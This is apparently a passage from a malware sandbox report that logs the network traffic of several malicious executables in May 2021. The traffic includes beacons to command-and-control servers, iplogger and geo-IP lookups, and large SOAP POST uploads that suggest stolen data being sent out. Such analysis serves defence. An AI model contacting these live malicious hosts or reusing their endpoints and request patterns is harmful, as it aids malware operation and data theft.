                          http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          POST /api/?sid=486563&key=05b44e597079906fcc1d90d00559969d HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          GET
                          https://iplogger.org/18hh57
                          gaoou.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:33 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=7c648ej4t0s72c1jstnjt6jc07; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257444298; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                          Host: 87.251.71.4
                          Content-Length: 137
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 4727
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:35:23 GMT
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          DNS
                          api.ip.sb
                          AddInProcess32.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.ip.sb
                          IN A
                          Response
                          api.ip.sb
                          IN CNAME
                          api.ip.sb.cdn.cloudflare.net
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          104.26.12.31
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          172.67.75.172
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          104.26.13.31
                        • flag-unknown
                          GET
                          https://api.ip.sb/geoip
                          AddInProcess32.exe
                          Remote address:
                          104.26.12.31:443
                          Request
                          GET /geoip HTTP/1.1
                          Host: api.ip.sb
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:35:25 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 285
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          Vary: Accept-Encoding
                          Cache-Control: no-cache
                          Access-Control-Allow-Origin: *
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30bc5fa00000414b733e9000000001
                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=glETeYEV309khJaMXT4uOvGI48c%2BULdA403UJkWSIAJBBWas%2FckRiWf6Zev60lrv4HpiC%2ByWM%2BXe8BfRSrnM0Za4reNu66rs8bk%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 652e30129c7c414b-HAM
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 150
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:43:59 GMT
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                          Host: 87.251.71.4
                          Content-Length: 1806093
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          31.13.72.36
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          31.13.72.36:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: c4MwX5JydJ8+RLY1bSRA8YQBR4j0yTWDOnIryeP4P8zS2Jy2yUUCqcHMno35qdRtq4OTSd0+IT8Pr8Rlz8GHmg==
                          Date: Fri, 21 May 2021 13:41:35 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          POST
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          POST /api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655 HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          GET
                          https://iplogger.org/18hh57
                          gaoou.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:37 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=o5jtlo0bus1c9o56pl6522c2h6; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257443694; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                          Host: 87.251.71.4
                          Content-Length: 1806093
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 261
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:48:15 GMT
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          31.13.83.36
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          31.13.83.36:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: JPj66tyFuq1fsUkXT9NSX2UUIuDk8tw2Bc/DLMK2uPNdxfQnCFCB9gULnpoeMdZ9JwjEclg+NmCWd3cmSsHnUw==
                          Date: Fri, 21 May 2021 13:51:39 GMT
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          POST
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          POST /api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          GET
                          https://iplogger.org/18hh57
                          gaoou.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:41 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=o9tiipdpr1b192lmo4729ij283; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257443090; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        • 217.107.34.191:443
                          https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419
                          tls, http
                          ABCbrow.exe
                          4.1kB
                           221.1kB
                           80
                          151

                          HTTP Request

                          GET https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419

                          HTTP Response

                          200
                        • 101.36.107.74:80
                          http://101.36.107.74/seemorebty/il.php?e=jg6_6asg
                          http
                          jg6_6asg.exe
                          690 B
                           487 B
                           6
                          5

                          HTTP Request

                          GET http://101.36.107.74/seemorebty/il.php?e=jg6_6asg

                          HTTP Response

                          200
                        • 88.99.66.31:443
                          https://iplogger.org/ZhvS4
                          tls, http
                          jg6_6asg.exe
                          1.2kB
                           7.1kB
                           10
                          10

                          HTTP Request

                          GET https://iplogger.org/ZhvS4

                          HTTP Response

                          200
                        • 208.95.112.1:80
                          http://ip-api.com/json/?fields=8198
                          http
                          SystemNetworkService
                          1.7kB
                           1.2kB
                           11
                          7

                          HTTP Request

                          GET http://ip-api.com/json/?fields=8198

                          HTTP Response

                          200

                          HTTP Request

                          GET http://ip-api.com/json/?fields=8198

                          HTTP Response

                          200

                          HTTP Request

                          GET http://ip-api.com/json/?fields=8198

                          HTTP Response

                          200

                          HTTP Request

                          GET http://ip-api.com/json/?fields=8198

                          HTTP Response

                          200
                        • 208.95.112.1:80
                          http://ip-api.com/json/
                          http
                          gaoou.exe
                          774 B
                           632 B
                           6
                          3

                          HTTP Request

                          GET http://ip-api.com/json/

                          HTTP Response

                          200
                        • 104.21.21.221:80
                          http://iw.gamegame.info/report7.4.php
                          http
                          SystemNetworkService
                          2.3kB
                           2.6kB
                           13
                          11

                          HTTP Request

                          POST http://iw.gamegame.info/report7.4.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://iw.gamegame.info/report7.4.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://iw.gamegame.info/report7.4.php

                          HTTP Response

                          200
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          548 B
                           172 B
                           4
                          4

                          HTTP Request

                          POST http://87.251.71.4//
                        • 172.67.200.215:80
                          http://ol.gamegame.info/report7.4.php
                          http
                          SystemNetworkService
                          916 B
                           921 B
                           7
                          5

                          HTTP Request

                          POST http://ol.gamegame.info/report7.4.php

                          HTTP Response

                          200
                        • 157.240.210.35:443
                          https://www.facebook.com/
                          tls, http
                          gaoou.exe
                          10.7kB
                           507.9kB
                           198
                          369

                          HTTP Request

                          GET https://www.facebook.com/

                          HTTP Response

                          200

                          HTTP Request

                          GET https://www.facebook.com/

                          HTTP Response

                          200
                        • 88.218.92.148:80
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d
                          http
                          gaoou.exe
                          1.2kB
                           801 B
                           8
                          7

                          HTTP Request

                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

                          HTTP Response

                          200

                          HTTP Request

                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d

                          HTTP Response

                          200
                        • 88.99.66.31:443
                          https://iplogger.org/18hh57
                          tls, http
                          gaoou.exe
                          1.3kB
                           6.3kB
                           10
                          11

                          HTTP Request

                          GET https://iplogger.org/18hh57

                          HTTP Response

                          200
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          153.1kB
                           7.6kB
                           117
                          68

                          HTTP Request

                          POST http://87.251.71.4//

                          HTTP Response

                          200

                          HTTP Request

                          POST http://87.251.71.4//
                        • 104.26.12.31:443
                          https://api.ip.sb/geoip
                          tls, http
                          AddInProcess32.exe
                          753 B
                           4.2kB
                           9
                          9

                          HTTP Request

                          GET https://api.ip.sb/geoip

                          HTTP Response

                          200
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          152.0kB
                           2.5kB
                           112
                          62

                          HTTP Request

                          POST http://87.251.71.4//
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          152.0kB
                           2.5kB
                           112
                          62

                          HTTP Request

                          POST http://87.251.71.4//
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          3.7MB
                           47.7kB
                           2488
                          1183

                          HTTP Request

                          POST http://87.251.71.4//

                          HTTP Response

                          200

                          HTTP Request

                          POST http://87.251.71.4//
                        • 31.13.72.36:443
                          https://www.facebook.com/
                          tls, http
                          gaoou.exe
                          5.8kB
                           255.9kB
                           106
                          189

                          HTTP Request

                          GET https://www.facebook.com/

                          HTTP Response

                          200
                        • 88.218.92.148:80
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655
                          http
                          gaoou.exe
                          1.2kB
                           793 B
                           8
                          7

                          HTTP Request

                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

                          HTTP Response

                          200

                          HTTP Request

                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655

                          HTTP Response

                          200
                        • 88.99.66.31:443
                          https://iplogger.org/18hh57
                          tls, http
                          gaoou.exe
                          1.4kB
                           6.4kB
                           11
                          12

                          HTTP Request

                          GET https://iplogger.org/18hh57

                          HTTP Response

                          200
                        • 87.251.71.4:80
                          http://87.251.71.4//
                          http
                          AddInProcess32.exe
                          1.9MB
                           26.9kB
                           1250
                          661

                          HTTP Request

                          POST http://87.251.71.4//

                          HTTP Response

                          200
                        • 31.13.83.36:443
                          https://www.facebook.com/
                          tls, http
                          gaoou.exe
                          5.9kB
                           256.0kB
                           107
                          189

                          HTTP Request

                          GET https://www.facebook.com/

                          HTTP Response

                          200
                        • 88.218.92.148:80
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac
                          http
                          gaoou.exe
                          1.2kB
                           841 B
                           8
                          8

                          HTTP Request

                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

                          HTTP Response

                          200

                          HTTP Request

                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac

                          HTTP Response

                          200
                        • 88.99.66.31:443
                          https://iplogger.org/18hh57
                          tls, http
                          gaoou.exe
                          1.4kB
                           6.4kB
                           11
                          12

                          HTTP Request

                          GET https://iplogger.org/18hh57

                          HTTP Response

                          200
                        • 8.8.8.8:53
                          email.yg9.me
                          dns
                          SystemNetworkService
                          58 B
                           74 B
                           1
                          1

                          DNS Request

                          email.yg9.me

                          DNS Response

                          198.13.62.186

                        • 8.8.8.8:53
                          email.yg9.me
                          dns
                          SystemNetworkService
                          58 B
                           129 B
                           1
                          1

                          DNS Request

                          email.yg9.me

                        • 198.13.62.186:53
                          email.yg9.me
                          SystemNetworkService
                          59.4kB
                           628.9kB
                           1124
                          1125
                        • 8.8.8.8:53
                          ma.pycharm3.ru
                          dns
                          ABCbrow.exe
                          60 B
                           76 B
                           1
                          1

                          DNS Request

                          ma.pycharm3.ru

                          DNS Response

                          217.107.34.191

                        • 8.8.8.8:53
                          iplogger.org
                          dns
                          gaoou.exe
                          58 B
                           74 B
                           1
                          1

                          DNS Request

                          iplogger.org

                          DNS Response

                          88.99.66.31

                        • 8.8.8.8:53
                          ip-api.com
                          dns
                          gaoou.exe
                          56 B
                           72 B
                           1
                          1

                          DNS Request

                          ip-api.com

                          DNS Response

                          208.95.112.1

                        • 8.8.8.8:53
                          iw.gamegame.info
                          dns
                          SystemNetworkService
                          62 B
                           94 B
                           1
                          1

                          DNS Request

                          iw.gamegame.info

                          DNS Response

                          104.21.21.221
                          172.67.200.215

                        • 8.8.8.8:53
                          ol.gamegame.info
                          dns
                          SystemNetworkService
                          62 B
                           94 B
                           1
                          1

                          DNS Request

                          ol.gamegame.info

                          DNS Response

                          172.67.200.215
                          104.21.21.221

                        • 8.8.8.8:53
                          www.facebook.com
                          dns
                          gaoou.exe
                          62 B
                           107 B
                           1
                          1

                          DNS Request

                          www.facebook.com

                          DNS Response

                          157.240.210.35

                        • 8.8.8.8:53
                          uyyge5w3ye.2ihsfa.com
                          dns
                          gaoou.exe
                          67 B
                           83 B
                           1
                          1

                          DNS Request

                          uyyge5w3ye.2ihsfa.com

                          DNS Response

                          88.218.92.148

                        • 8.8.8.8:53
                          api.ip.sb
                          dns
                          AddInProcess32.exe
                          55 B
                           145 B
                           1
                          1

                          DNS Request

                          api.ip.sb

                          DNS Response

                          104.26.12.31
                          172.67.75.172
                          104.26.13.31

                        • 8.8.8.8:53
                          www.facebook.com
                          dns
                          gaoou.exe
                          62 B
                           107 B
                           1
                          1

                          DNS Request

                          www.facebook.com

                          DNS Response

                          31.13.72.36

                        • 8.8.8.8:53
                          www.facebook.com
                          dns
                          gaoou.exe
                          62 B
                           107 B
                           1
                          1

                          DNS Request

                          www.facebook.com

                          DNS Response

                          31.13.83.36

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/752-146-0x0000028A44F30000-0x0000028A44FA0000-memory.dmp

                          Filesize

                          448KB

                          Download

                        • memory/1008-240-0x00000196C6940000-0x00000196C69B0000-memory.dmp

                          Filesize

                          448KB

                          Download

                        • memory/1008-145-0x00000196C6810000-0x00000196C6880000-memory.dmp

                          Filesize

                          448KB

                          Download

                        • memory/1084-248-0x0000022C8DF90000-0x0000022C8E000000-memory.dmp

                          Filesize

                          448KB

                          Download

                        • memory/1084-176-0x0000022C8DEB0000-0x0000022C8DF20000-memory.dmp

                          Filesize

                          448KB

                          Download

                        • memory/1112-134-0x000001293F860000-0x000001293F8AB000-memory.dmp

                          Filesize

                          300KB

                          Download

